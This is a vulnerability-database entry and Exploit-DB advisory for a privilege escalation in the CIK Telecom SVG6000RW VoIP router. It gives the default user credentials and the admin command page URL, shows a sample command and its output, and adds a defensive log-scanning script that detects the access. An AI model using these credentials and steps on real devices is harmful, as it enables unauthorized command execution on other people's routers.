vendor: SVG6000RW
by: Chako
CVSS: 8,8 HIGH
Privilege Escalation and Command Execution
CWE: N/A
Product Name: SVG6000RW
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: h:cik_telecom:svg6000rw
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution

The CIK Telecom VoIP router SVG6000RW has a privilege escalation vulnerability that can lead to command execution. Log in as a normal user with the default username 'User' and password 'cikvoip', then change the URL to http://URL/adm/system_command.asp; you can now run commands.

Mitigation:

Upgrade to the latest version of the CIK Telecom VoIP router SVG6000RW
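
A defender-side check for the access described above, as an added example that is not part of the original advisory: it flags requests under /adm/ made by any account outside an admin allowlist. The Common Log Format input (for instance from a reverse proxy in front of the web UI), the `admin` account name and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: Common Log Format, authenticated account in the third field.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ADMIN_USERS = {"admin"}  # assumption: site-specific allowlist of admin accounts


def normalize(raw_path):
    """Canonicalise a request path so /adm/ is matched regardless of spelling."""
    path = unquote(raw_path.split("?", 1)[0])   # drop query, decode %xx once
    path = re.sub(r"/+", "/", path)             # collapse repeated slashes
    return posixpath.normpath(path).lower()     # resolve . and .., fold case


def flag_admin_access(lines, admin_users=ADMIN_USERS):
    """Return (ip, user, path, status) for /adm/ requests by non-admin accounts."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a request line in the assumed format
        path = normalize(m["path"])
        in_admin_area = path == "/adm" or path.startswith("/adm/")
        if in_admin_area and m["user"] not in admin_users:
            hits.append((m["ip"], m["user"], path, int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE = [
    '192.0.2.10 - admin [10/Dec/2014:09:00:01 +0000] "GET /adm/system_command.asp HTTP/1.1" 200 5120',
    '192.0.2.20 - User [10/Dec/2014:09:05:12 +0000] "GET /home.asp HTTP/1.1" 200 2048',
    '192.0.2.20 - User [10/Dec/2014:09:05:40 +0000] "GET /adm/system_command.asp HTTP/1.1" 200 5120',
    '192.0.2.20 - User [10/Dec/2014:09:06:02 +0000] "POST //ADM/./system_command.asp?x=1 HTTP/1.1" 200 311',
    '198.51.100.7 - - [10/Dec/2014:09:10:00 +0000] "GET /adm/system_command.asp HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for ip, user, path, status in flag_admin_access(SAMPLE):
        # A 200 means the admin page was actually served to that account.
        print(f"{ip} user={user} path={path} status={status}")
```

A flagged entry with status 200 deserves the most attention, since it means the admin page was served to a non-admin session.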

Exploit-DB raw data:

####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################

Description:
  CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerability
  and can lead to Command Execution.


Exploit:

1) Log in as a normal user
   Default Username: User Password: cikvoip

2) Change URL to http://URL/adm/system_command.asp
   and now you can run commands.


Example:

Command: ls /etc_rw/web

Result:

internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm